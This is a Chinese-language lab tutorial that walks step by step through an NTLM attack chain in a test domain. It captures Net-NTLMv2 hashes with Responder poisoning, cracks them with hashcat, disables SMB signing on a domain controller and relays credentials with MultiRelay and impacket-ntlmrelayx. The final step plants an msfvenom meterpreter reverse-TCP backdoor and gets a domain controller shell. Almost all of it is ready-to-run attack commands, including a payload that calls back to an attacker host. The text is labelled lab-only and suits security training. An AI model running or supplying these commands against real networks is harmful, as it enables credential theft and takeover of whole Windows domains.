SMB中继+Responder NTLM捕获实验分步教程

前置说明:本实验仅在自建教学域环境操作,严禁对公网/陌生设备使用;实验只会抓取本机认证哈希、远程创建测试文件夹,不删改系统文件、不窃取真实数据。
环境IP示例:
Kali:192.168.1.128
Win7:192.168.1.11(普通域成员,administrator域账号登录)
Win2012:192.168.1.10(域控)

任务1:Responder抓取Win7 Net-NTLMv2 Hash

启动Responder

responder -I eth0 -wrf
  • 参数说明:-I 指定网卡;-w开启WPAD劫持,-r/-f开启SMB/NetBIOS应答

  1. Win7端触发请求:Win7打开此电脑,地址栏输入\\KALIIP(\192.168.1.100),回车

  2. 回到Kali,Responder控制台自动打印捕获到的administrator的Net-NTLMv2哈希,复制整串哈希保存到hash.txt

任务2:hashcat爆破NTLM哈希

  1. 准备密码字典(常用rockyou.txt,kali自带),解压字典:

gunzip /usr/share/wordlists/rockyou.txt.gz
  1. hashcat爆破命令(NTLMv2哈希模式:5600)

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
  • 破解成功会显示明文密码(实验需要爆破不出来可以自己手动把自己的密码添加到rockyou字典里面)

爆破出来密码是Admin12345@

任务3:Win2012域控关闭SMB签名(中继必要配置)

灰色无法修改

原因

域控加入AD域后,域组策略优先覆盖本地组策略,本地gpedit选项灰化无法修改,需要去域组策略管理器关闭SMB强制签名。

步骤1:打开域组策略管理器

  1. 开始菜单→组策略管理(GPMC.msc)

  2. 找到你的域(LYH)→右键Default Domain Policy → 编辑

步骤2:修改两处SMB签名配置

路径:
计算机配置→Windows设置→安全设置→本地策略→安全选项

  1. Microsoft网络服务器: 对通信进行数字签名(始终) → 禁用

  2. Microsoft网络客户端: 对通信进行数字签名(始终) → 禁用

步骤3:刷新组策略生效

域控CMD执行:

gpupdate /force

等待策略刷新完毕,本地组策略就不再灰色锁定。

补充小提示

改完之后才能正常做SMB中继,两个签名项全都要禁用,只改一个中继依然失败。

SMB签名开启会拦截NTLM中继,实验必须临时关闭,实验结束可复原

  1. Win2012打开gpedit.msc组策略编辑器

  2. 计算机配置→Windows设置→安全设置→本地策略→安全选项

  3. 找到「Microsoft网络客户端:对通信进行数字签名(始终)」→禁用

  4. 找到「Microsoft网络服务器:对通信进行数字签名(始终)」→禁用

  5. CMD刷新组策略:gpupdate /force

任务4:MultiRelayx NTLM中继:劫持Win7凭据→横向拿下Win2012(域控)

环境:

  • 攻击机Kali:192.168.1.128

  • 受害者Win7:客户端

  • 目标Win2012域控:192.168.1.10
    前提:Win2012关闭SMB签名(开签名中继失效,你之前踩过坑)

1:配置Responder关闭SMB、HTTP(MultiRelay独占445)

sed -i 's/SMB = On/SMB = Off/g' /usr/share/responder/Responder.conf
sed -i 's/HTTP = On/HTTP = Off/g' /usr/share/responder/Responder.conf

2:启动MultiRelayx中继脚本(指定目标域控IP)

python3 /usr/share/responder/tools/MultiRelay.py -t 192.168.1.10 -u ALL
  • -t:中继转发目标(Win2012域控)

  • -u ALL:抓到凭据自动尝试登录目标

3:新开终端启动Responder投毒(LLMNR/NBT-NS欺骗Win7)

responder -I eth0 -w

4:Win7客户端操作

此电脑→地址栏输入\\随便乱输域名(触发LLMNR查询,被Kali投毒)

MultiRelay自动抓取Win7的NTLM哈希,直接中继转发到192.168.1.10,成功则弹出域控CMD,直接拿到权限。

关键:域控SMB强制开启签名=中继失败,只能改用实验5木马上线。


任务5:msfvenom生成后门并利用smbrelayx.py对winServer2012进行中继攻击上传木马,→MSF监听拿域控shell

1、Kali生成Windows反弹木马(x64,反弹IP=你的kali)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=443 -f exe > backdoor.exe

2、MSF开启监听(新开终端)

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.128
set LPORT 443
run

保持窗口挂起等待上线。

3、ntlmrelayx(smbrelayx的新版)

# SMB中继传马写法(替代smbrelayx)
impacket-ntlmrelayx -t smb://192.168.1.10 -smb2support -e /home/kali/Desktop/new.exe

当前状态:ntlmrelayx已经成功启动(只剩WinRM端口报错,SMB:445、HTTP:80正常监听,不影响本次SMB中继实验,不用重开工具)

4、直接去Win7客户端执行触发命令

net use \\192.168.1.128\test

触发LLMNR解析 → 抓取NTLM哈希 → ntlmrelayx自动中继192.168.1.10、上传+运行new.exeMSF自动弹出meterpreter会话,实验5完成

impacket-ntlmrelayx -t smb://192.168.1.10 --smb2support -e /home/kali/Desktop/new.exe --no-winrm-server --no-wcf-server --no-rpc-server